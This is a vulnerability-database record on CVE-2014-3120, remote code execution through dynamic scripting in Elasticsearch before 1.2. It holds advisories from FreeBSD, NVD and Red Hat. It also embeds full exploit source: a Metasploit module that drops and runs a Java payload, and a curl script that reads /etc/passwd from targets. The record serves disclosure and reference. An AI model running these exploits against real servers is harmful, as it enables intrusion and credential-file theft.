elasticsearch and logstash -- remote OS command execution via dynamic scripting
2014-05-22T00:00:00
ID 43AC9D42-1B9A-11E5-B43D-002590263BF5 Type freebsd Reporter FreeBSD Modified 2014-05-22T00:00:00
Description
Elastic reports:
Vulnerability Summary: In Elasticsearch versions 1.1.x and prior,
dynamic scripting is enabled by default. This could allow an
attacker to execute OS commands.
Remediation Summary: Disable dynamic scripting.
Logstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is
vulnerable to CVE-2014-3120. These binaries are used in
Elasticsearch output specifically when using the node protocol.
Since a node client joins the Elasticsearch cluster, the attackers
could use scripts to execute commands on the host OS using the node
client's URL endpoint. With 1.4.3 release, we are packaging Logstash
with Elasticsearch 1.5.2 binaries which by default disables the
ability to run scripts. This also affects users who are using the
configuration option embedded=>true in the Elasticsearch output
which starts a local embedded Elasticsearch cluster. This is
typically used in development environment and proof of concept
deployments. Regardless of this vulnerability, we strongly recommend
not using embedded in production.
Note that users of transport and http protocol are not vulnerable
to this attack.
{"id": "43AC9D42-1B9A-11E5-B43D-002590263BF5", "bulletinFamily": "unix", "title": "elasticsearch and logstash -- remote OS command execution via dynamic scripting", "description": "\nElastic reports:\n\nVulnerability Summary: In Elasticsearch versions 1.1.x and prior,\n\t dynamic scripting is enabled by default. This could allow an\n\t attacker to execute OS commands.\nRemediation Summary: Disable dynamic scripting.\n\n\nLogstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is\n\t vulnerable to CVE-2014-3120. These binaries are used in\n\t Elasticsearch output specifically when using the node protocol.\n\t Since a node client joins the Elasticsearch cluster, the attackers\n\t could use scripts to execute commands on the host OS using the node\n\t client's URL endpoint. With 1.4.3 release, we are packaging Logstash\n\t with Elasticsearch 1.5.2 binaries which by default disables the\n\t ability to run scripts. This also affects users who are using the\n\t configuration option embedded=>true in the Elasticsearch output\n\t which starts a local embedded Elasticsearch cluster. This is\n\t typically used in development environment and proof of concept\n\t deployments. Regardless of this vulnerability, we strongly recommend\n\t not using embedded in production.\nNote that users of transport and http protocol are not vulnerable\n\t to this attack.\n\n", "published": "2014-05-22T00:00:00", "modified": "2014-05-22T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://vuxml.freebsd.org/freebsd/43ac9d42-1b9a-11e5-b43d-002590263bf5.html", "reporter": "FreeBSD", "references": ["https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch", "https://www.exploit-db.com/exploits/33370/", "http://bouk.co/blog/elasticsearch-rce/", "http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce", "https://www.elastic.co/blog/logstash-1-4-3-released", "https://www.elastic.co/community/security", "https://www.elastic.co/blog/elasticsearch-1-2-0-released"], "cvelist": ["CVE-2014-3120"], "type": "freebsd", "lastseen": "2019-05-29T18:33:12", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "elasticsearch", "packageVersion": "1.2.0"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "logstash", "packageVersion": "1.4.3"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-3120"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nElastic reports:\n\nVulnerability Summary: In Elasticsearch versions 1.1.x and prior,\n\t dynamic scripting is enabled by default. This could allow an\n\t attacker to execute OS commands.\nRemediation Summary: Disable dynamic scripting.\n\n\nLogstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is\n\t vulnerable to CVE-2014-3120. These binaries are used in\n\t Elasticsearch output specifically when using the node protocol.\n\t Since a node client joins the Elasticsearch cluster, the attackers\n\t could use scripts to execute commands on the host OS using the node\n\t client's URL endpoint. With 1.4.3 release, we are packaging Logstash\n\t with Elasticsearch 1.5.2 binaries which by default disables the\n\t ability to run scripts. This also affects users who are using the\n\t configuration option embedded=>true in the Elasticsearch output\n\t which starts a local embedded Elasticsearch cluster. This is\n\t typically used in development environment and proof of concept\n\t deployments. Regardless of this vulnerability, we strongly recommend\n\t not using embedded in production.\nNote that users of transport and http protocol are not vulnerable\n\t to this attack.\n\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e59886affa8aab88c28930d17a99da4e233f78778fe073eed573113c279107f2", "hashmap": [{"hash": "bc160a886b142b68871f43e041182eb9", "key": "description"}, {"hash": "bf9f86be5652af741cfb972d20d0f83b", "key": "href"}, {"hash": "bfdd641b7110850b2b913732d1d9e8cf", "key": "modified"}, {"hash": "2c369d792801d47c83acb6463a137283", "key": "cvelist"}, {"hash": "bfdd641b7110850b2b913732d1d9e8cf", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2b9915fba66a71886eb5143ddd843032", "key": "references"}, {"hash": "f5ed64f5799a8b71f317495a58c08af7", "key": "affectedPackage"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "99e24d525c4ffd3ec192b2a7d9b7942e", "key": "title"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/43ac9d42-1b9a-11e5-b43d-002590263bf5.html", "id": "43AC9D42-1B9A-11E5-B43D-002590263BF5", "lastseen": "2018-08-30T19:14:27", "modified": "2014-05-22T00:00:00", "objectVersion": "1.3", "published": "2014-05-22T00:00:00", "references": ["https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch", "https://www.exploit-db.com/exploits/33370/", "http://bouk.co/blog/elasticsearch-rce/", "http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce", "https://www.elastic.co/blog/logstash-1-4-3-released", "https://www.elastic.co/community/security", "https://www.elastic.co/blog/elasticsearch-1-2-0-released"], "reporter": "FreeBSD", "title": "elasticsearch and logstash -- remote OS command execution via dynamic scripting", "type": "freebsd", "viewCount": 1}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:14:27"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "elasticsearch", "packageVersion": "1.2.0"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "logstash", "packageVersion": "1.4.3"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-3120"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "\nElastic reports:\n\nVulnerability Summary: In Elasticsearch versions 1.1.x and prior,\n\t dynamic scripting is enabled by default. This could allow an\n\t attacker to execute OS commands.\nRemediation Summary: Disable dynamic scripting.\n\n\nLogstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is\n\t vulnerable to CVE-2014-3120. These binaries are used in\n\t Elasticsearch output specifically when using the node protocol.\n\t Since a node client joins the Elasticsearch cluster, the attackers\n\t could use scripts to execute commands on the host OS using the node\n\t client's URL endpoint. With 1.4.3 release, we are packaging Logstash\n\t with Elasticsearch 1.5.2 binaries which by default disables the\n\t ability to run scripts. This also affects users who are using the\n\t configuration option embedded=>true in the Elasticsearch output\n\t which starts a local embedded Elasticsearch cluster. This is\n\t typically used in development environment and proof of concept\n\t deployments. Regardless of this vulnerability, we strongly recommend\n\t not using embedded in production.\nNote that users of transport and http protocol are not vulnerable\n\t to this attack.\n\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2018-08-31T01:14:39", "references": [{"idList": ["OPENVAS:1361412562310105032"], "type": "openvas"}, {"idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707"], "type": "talosblog"}, {"idList": ["FREEBSD_PKG_43AC9D421B9A11E5B43D002590263BF5.NASL", "ELASTICSEARCH_RCE.NASL", "REDHAT-RHSA-2014-1186.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201892387"], "type": "myhack58"}, {"idList": ["RHSA-2014:1186", "RHSA-2014:1171", "RHSA-2014:1170"], "type": "redhat"}, {"idList": ["EDB-ID:33370", "EDB-ID:33588"], "type": "exploitdb"}, {"idList": ["MSF:EXPLOIT/MULTI/ELASTICSEARCH/SCRIPT_MVEL_RCE"], "type": "metasploit"}, {"idList": ["CVE-2014-3120"], "type": "cve"}, {"idList": ["PACKETSTORM:127689", "PACKETSTORM:126863"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-22252", "1337DAY-ID-22300"], "type": "zdt"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "1ed2046f2fe8bb71db827b65b48ca661acca79a1d6f7e7d531bcafb701eabe68", "hashmap": [{"hash": "bc160a886b142b68871f43e041182eb9", "key": "description"}, {"hash": "bf9f86be5652af741cfb972d20d0f83b", "key": "href"}, {"hash": "bfdd641b7110850b2b913732d1d9e8cf", "key": "modified"}, {"hash": "2c369d792801d47c83acb6463a137283", "key": "cvelist"}, {"hash": "bfdd641b7110850b2b913732d1d9e8cf", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2b9915fba66a71886eb5143ddd843032", "key": "references"}, {"hash": "f5ed64f5799a8b71f317495a58c08af7", "key": "affectedPackage"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "99e24d525c4ffd3ec192b2a7d9b7942e", "key": "title"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/43ac9d42-1b9a-11e5-b43d-002590263bf5.html", "id": "43AC9D42-1B9A-11E5-B43D-002590263BF5", "lastseen": "2018-08-31T01:14:39", "modified": "2014-05-22T00:00:00", "objectVersion": "1.3", "published": "2014-05-22T00:00:00", "references": ["https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch", "https://www.exploit-db.com/exploits/33370/", "http://bouk.co/blog/elasticsearch-rce/", "http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce", "https://www.elastic.co/blog/logstash-1-4-3-released", "https://www.elastic.co/community/security", "https://www.elastic.co/blog/elasticsearch-1-2-0-released"], "reporter": "FreeBSD", "title": "elasticsearch and logstash -- remote OS command execution via dynamic scripting", "type": "freebsd", "viewCount": 2}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-31T01:14:39"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "elasticsearch", "packageVersion": "1.2.0"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "logstash", "packageVersion": "1.4.3"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-3120"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "\nElastic reports:\n\nVulnerability Summary: In Elasticsearch versions 1.1.x and prior,\n\t dynamic scripting is enabled by default. This could allow an\n\t attacker to execute OS commands.\nRemediation Summary: Disable dynamic scripting.\n\n\nLogstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is\n\t vulnerable to CVE-2014-3120. These binaries are used in\n\t Elasticsearch output specifically when using the node protocol.\n\t Since a node client joins the Elasticsearch cluster, the attackers\n\t could use scripts to execute commands on the host OS using the node\n\t client's URL endpoint. With 1.4.3 release, we are packaging Logstash\n\t with Elasticsearch 1.5.2 binaries which by default disables the\n\t ability to run scripts. This also affects users who are using the\n\t configuration option embedded=>true in the Elasticsearch output\n\t which starts a local embedded Elasticsearch cluster. This is\n\t typically used in development environment and proof of concept\n\t deployments. Regardless of this vulnerability, we strongly recommend\n\t not using embedded in production.\nNote that users of transport and http protocol are not vulnerable\n\t to this attack.\n\n", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "1ed2046f2fe8bb71db827b65b48ca661acca79a1d6f7e7d531bcafb701eabe68", "hashmap": [{"hash": "bc160a886b142b68871f43e041182eb9", "key": "description"}, {"hash": "bf9f86be5652af741cfb972d20d0f83b", "key": "href"}, {"hash": "bfdd641b7110850b2b913732d1d9e8cf", "key": "modified"}, {"hash": "2c369d792801d47c83acb6463a137283", "key": "cvelist"}, {"hash": "bfdd641b7110850b2b913732d1d9e8cf", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2b9915fba66a71886eb5143ddd843032", "key": "references"}, {"hash": "f5ed64f5799a8b71f317495a58c08af7", "key": "affectedPackage"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "99e24d525c4ffd3ec192b2a7d9b7942e", "key": "title"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/43ac9d42-1b9a-11e5-b43d-002590263bf5.html", "id": "43AC9D42-1B9A-11E5-B43D-002590263BF5", "lastseen": "2016-09-26T17:24:18", "modified": "2014-05-22T00:00:00", "objectVersion": "1.2", "published": "2014-05-22T00:00:00", "references": ["https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch", "https://www.exploit-db.com/exploits/33370/", "http://bouk.co/blog/elasticsearch-rce/", "http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce", "https://www.elastic.co/blog/logstash-1-4-3-released", "https://www.elastic.co/community/security", "https://www.elastic.co/blog/elasticsearch-1-2-0-released"], "reporter": "FreeBSD", "title": "elasticsearch and logstash -- remote OS command execution via dynamic scripting", "type": "freebsd", "viewCount": 1}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:24:18"}], "edition": 4, "hashmap": [{"key": "affectedPackage", "hash": "f5ed64f5799a8b71f317495a58c08af7"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "2c369d792801d47c83acb6463a137283"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "description", "hash": "bc160a886b142b68871f43e041182eb9"}, {"key": "href", "hash": "bf9f86be5652af741cfb972d20d0f83b"}, {"key": "modified", "hash": "bfdd641b7110850b2b913732d1d9e8cf"}, {"key": "published", "hash": "bfdd641b7110850b2b913732d1d9e8cf"}, {"key": "references", "hash": "2b9915fba66a71886eb5143ddd843032"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "99e24d525c4ffd3ec192b2a7d9b7942e"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "7ddb842d4a0af7569d8bc80b8b1c2d19bee65e6a30022f02149b29af3832b3ea", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3120"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2014-1186.NASL", "FREEBSD_PKG_43AC9D421B9A11E5B43D002590263BF5.NASL", "ELASTICSEARCH_RCE.NASL"]}, {"type": "redhat", "idList": ["RHSA-2014:1171", "RHSA-2014:1170", "RHSA-2014:1186"]}, {"type": "zdt", "idList": ["1337DAY-ID-22300", "1337DAY-ID-22252"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/ELASTICSEARCH/SCRIPT_MVEL_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126863", "PACKETSTORM:127689"]}, {"type": "exploitdb", "idList": ["EDB-ID:33588", "EDB-ID:33370"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105032"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892387"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707"]}], "modified": "2019-05-29T18:33:12"}, "score": {"value": 5.7, "vector": "NONE", "modified": "2019-05-29T18:33:12"}, "vulnersScore": 5.7}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "elasticsearch", "packageVersion": "1.2.0"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "logstash", "packageVersion": "1.4.3"}], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:13:45", "bulletinFamily": "NVD", "description": "The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.", "modified": "2016-12-06T18:13:00", "id": "CVE-2014-3120", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3120", "published": "2014-07-28T19:55:00", "title": "CVE-2014-3120", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:14", "bulletinFamily": "exploit", "description": "", "modified": "2014-05-30T00:00:00", "published": "2014-05-30T00:00:00", "href": "https://packetstormsecurity.com/files/126863/ElasticSearch-Dynamic-Script-Arbitrary-Java-Execution.html", "id": "PACKETSTORM:126863", "type": "packetstorm", "title": "ElasticSearch Dynamic Script Arbitrary Java Execution", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in ElasticSearch, \nexploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the \nREST API, which requires no authentication or authorization, where the search \nfunction allows dynamic scripts execution, and can be used for remote attackers \nto execute arbitrary Java code. This module has been tested successfully on \nElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. \n}, \n'Author' => \n[ \n'Alex Brasetvik', # Vulnerability discovery \n'Bouke van der Bijl', # Vulnerability discovery and PoC \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2014-3120'], \n['OSVDB', '106949'], \n['EDB', '33370'], \n['URL', 'http://bouk.co/blog/elasticsearch-rce/'], \n['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch'] \n], \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'ElasticSearch 1.1.1 / Automatic', { } ] \n], \n'DisclosureDate' => 'Dec 09 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(9200), \nOptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', \"/\"]), \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only for *nix environments)\", \"/tmp\" ]) \n], self.class) \nend \n \ndef check \nresult = Exploit::CheckCode::Safe \n \nif vulnerable? \nresult = Exploit::CheckCode::Vulnerable \nend \n \nresult \nend \n \ndef exploit \nprint_status(\"#{peer} - Trying to execute arbitrary Java..\") \nunless vulnerable? \nfail_with(Failure::Unknown, \"#{peer} - Java has not been executed, aborting...\") \nend \n \nprint_status(\"#{peer} - Asking remote OS...\") \nres = execute(java_os) \nresult = parse_result(res) \nif result.nil? \nfail_with(Failure::Unknown, \"#{peer} - Could not get remote OS...\") \nelse \nprint_good(\"#{peer} - OS #{result} found\") \nend \n \njar_file = \"\" \nif result =~ /win/i \nprint_status(\"#{peer} - Asking TEMP path\") \nres = execute(java_tmp_dir) \nresult = parse_result(res) \nif result.nil? \nfail_with(Failure::Unknown, \"#{peer} - Could not get TEMP path...\") \nelse \nprint_good(\"#{peer} - TEMP path found on #{result}\") \nend \njar_file = \"#{result}#{rand_text_alpha(3 + rand(4))}.jar\" \nelse \njar_file = File.join(datastore['WritableDir'], \"#{rand_text_alpha(3 + rand(4))}.jar\") \nend \n \nregister_file_for_cleanup(jar_file) \nexecute(java_payload(jar_file)) \nend \n \ndef vulnerable? \naddend_one = rand_text_numeric(rand(3) + 1).to_i \naddend_two = rand_text_numeric(rand(3) + 1).to_i \nsum = addend_one + addend_two \n \njava = java_sum([addend_one, addend_two]) \nres = execute(java) \nresult = parse_result(res) \n \nif result.nil? \nreturn false \nelse \nresult.to_i == sum \nend \nend \n \ndef parse_result(res) \nunless res && res.code == 200 && res.body \nreturn nil \nend \n \nbegin \njson = JSON.parse(res.body.to_s) \nrescue JSON::ParserError \nreturn nil \nend \n \nbegin \nresult = json['hits']['hits'][0]['fields']['msf_result'][0] \nrescue \nreturn nil \nend \n \nresult \nend \n \ndef java_sum(summands) \nsource = <<-EOF \n#{summands.join(\" + \")} \nEOF \n \nsource \nend \n \ndef to_java_byte_array(str) \nbuff = \"byte[] buf = new byte[#{str.length}];\\n\" \ni = 0 \nstr.unpack('C*').each do |c| \nbuff << \"buf[#{i}] = #{c};\\n\" \ni = i + 1 \nend \n \nbuff \nend \n \ndef java_os \n\"System.getProperty(\\\"os.name\\\")\" \nend \n \ndef java_tmp_dir \n\"System.getProperty(\\\"java.io.tmpdir\\\");\" \nend \n \n \ndef java_payload(file_name) \nsource = <<-EOF \nimport java.io.*; \nimport java.lang.*; \nimport java.net.*; \n \n#{to_java_byte_array(payload.encoded_jar.pack)} \nFile f = new File('#{file_name.gsub(/\\\\/, \"/\")}'); \nFileOutputStream fs = new FileOutputStream(f); \nbs = new BufferedOutputStream(fs); \nbs.write(buf); \nbs.close(); \nbs = null; \nURL u = f.toURI().toURL(); \nURLClassLoader cl = new URLClassLoader(new java.net.URL[]{u}); \nClass c = cl.loadClass('metasploit.Payload'); \nc.main(null); \nEOF \n \nsource \nend \n \ndef execute(java) \npayload = { \n\"size\" => 1, \n\"query\" => { \n\"filtered\" => { \n\"query\" => { \n\"match_all\" => {} \n} \n} \n}, \n\"script_fields\" => { \n\"msf_result\" => { \n\"script\" => java \n} \n} \n} \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s, \"_search\"), \n'method' => 'POST', \n'data' => JSON.generate(payload) \n}) \n \nreturn res \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126863/script_mvel_rce.rb.txt"}, {"lastseen": "2016-12-05T22:15:09", "bulletinFamily": "exploit", "description": "", "modified": "2014-07-30T00:00:00", "published": "2014-07-30T00:00:00", "href": "https://packetstormsecurity.com/files/127689/Elastic-Search-1.1.1-Arbitrary-File-Read.html", "id": "PACKETSTORM:127689", "type": "packetstorm", "title": "Elastic Search 1.1.1 Arbitrary File Read", "sourceData": "`#!/bin/bash \n#Exploit Elastic Search 1.1.1 CVE-2014-3120 \n#Larry W. Cashdollar @_larry0 \n#http://www.vapid.dhs.org/exploits/elasticexploit.sh.txt \n#http://bouk.co/blog/elasticsearch-rce/ \n#Vulnerability author Bouke van der Bijl \n \necho \"[+} Adding initial entry to $1:9200\" \ncurl -XPOST \"http://$1:9200/data/test/1\" -d '{\"exploit\":\"larry0\"}' \necho \"[+] Executing exploit against $1\" \necho \"\" \necho \"[+] Attempting to read /etc/hosts and /etc/passwd\" \n \n#This could be easily changed to request other neat files, like stuff out of /proc. \n \ncurl \"http://$1:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery111107445037360303104_1406750975253&_=1406750975254\" \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/127689/elasticsearch111-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:46", "bulletinFamily": "unix", "description": "The katello-configure package provides the katello-configure script, which\nconfigures the Katello installation, and the katello-upgrade script, which\nhandles upgrades between versions.\n\nIt was discovered that the default configuration of Elasticsearch enabled\ndynamic scripting, allowing a remote attacker to execute arbitrary MVEL\nexpressions and Java code via the source parameter passed to _search.\n(CVE-2014-3120)\n\nAll Subscription Asset Manager users are advised to upgrade to this updated\npackage. The update provides a script that modifies the elasticsearch.yml\nconfiguration file to disable dynamic scripting. After updating, run the\n\"katello-configure\" command. This will update the elasticsearch.yml\nconfiguration file and restart the elasticsearch service.\n", "modified": "2018-06-07T09:01:02", "published": "2014-09-11T04:00:00", "id": "RHSA-2014:1186", "href": "https://access.redhat.com/errata/RHSA-2014:1186", "type": "redhat", "title": "(RHSA-2014:1186) Important: katello-configure security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:33:40", "bulletinFamily": "unix", "description": "Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.\nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nFuse ESB Enterprise and Fuse MQ Enterprise include the insight plug-in,\nwhich provides insight into a Fuse Fabric using Elasticsearch to query data\nfor logs, metrics or historic Camel messages. This plug-in is not enabled\nby default, and is provided as a technology preview. If it is enabled by\ninstalling the feature, for example:\n\nJBossFuse:karaf@root> features:install insight-elasticsearch\n\nThen an Elasticsearch server will be started. It was discovered that the\ndefault configuration of Elasticsearch enabled dynamic scripting, allowing\na remote attacker to execute arbitrary MVEL expressions and Java code via\nthe source parameter passed to _search. (CVE-2014-3120)\n\nAll users of Fuse ESB Enterprise and Fuse MQ Enterprise 7.1.0 as provided\nfrom the Red Hat Customer Portal who have enabled Elasticsearch are advised\nto follow the instructions provided in the Solution section of this\nadvisory.\n", "modified": "2019-03-22T23:43:56", "published": "2014-09-10T04:00:00", "id": "RHSA-2014:1171", "href": "https://access.redhat.com/errata/RHSA-2014:1171", "type": "redhat", "title": "(RHSA-2014:1171) Important: Fuse ESB Enterprise/Fuse MQ Enterprise 7.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:18", "bulletinFamily": "unix", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform. Red\nHat JBoss A-MQ, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nRed Hat JBoss Fuse and A-MQ include the insight plug-in, which provides\ninsight into a Fuse Fabric using Elasticsearch to query data for logs,\nmetrics or historic Camel messages. This plug-in is not enabled by default,\nand is provided as a technology preview. If it is enabled by installing the\nfeature, for example:\n\nJBossFuse:karaf@root> features:install insight-elasticsearch\n\nThen an Elasticsearch server will be started. It was discovered that the\ndefault configuration of Elasticsearch enabled dynamic scripting, allowing\na remote attacker to execute arbitrary MVEL expressions and Java code via\nthe source parameter passed to _search. (CVE-2014-3120)\n\nAll users of Red Hat JBoss Fuse and A-MQ 6.1.0 as provided from the Red Hat\nCustomer Portal who have enabled Elasticsearch are advised to follow the\ninstructions provided in the Solution section of this advisory.", "modified": "2019-02-20T17:17:36", "published": "2014-09-10T09:27:38", "id": "RHSA-2014:1170", "href": "https://access.redhat.com/errata/RHSA-2014:1170", "type": "redhat", "title": "(RHSA-2014:1170) Important: Red Hat JBoss Fuse/A-MQ 6.1.0 security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-20T03:30:04", "bulletinFamily": "exploit", "description": "Exploit for java platform in category remote exploits", "modified": "2014-06-01T00:00:00", "published": "2014-06-01T00:00:00", "id": "1337DAY-ID-22300", "href": "https://0day.today/exploit/description/22300", "type": "zdt", "title": "ElasticSearch Dynamic Script Arbitrary Java Execution", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in ElasticSearch,\r\n exploitable by default on ElasticSearch 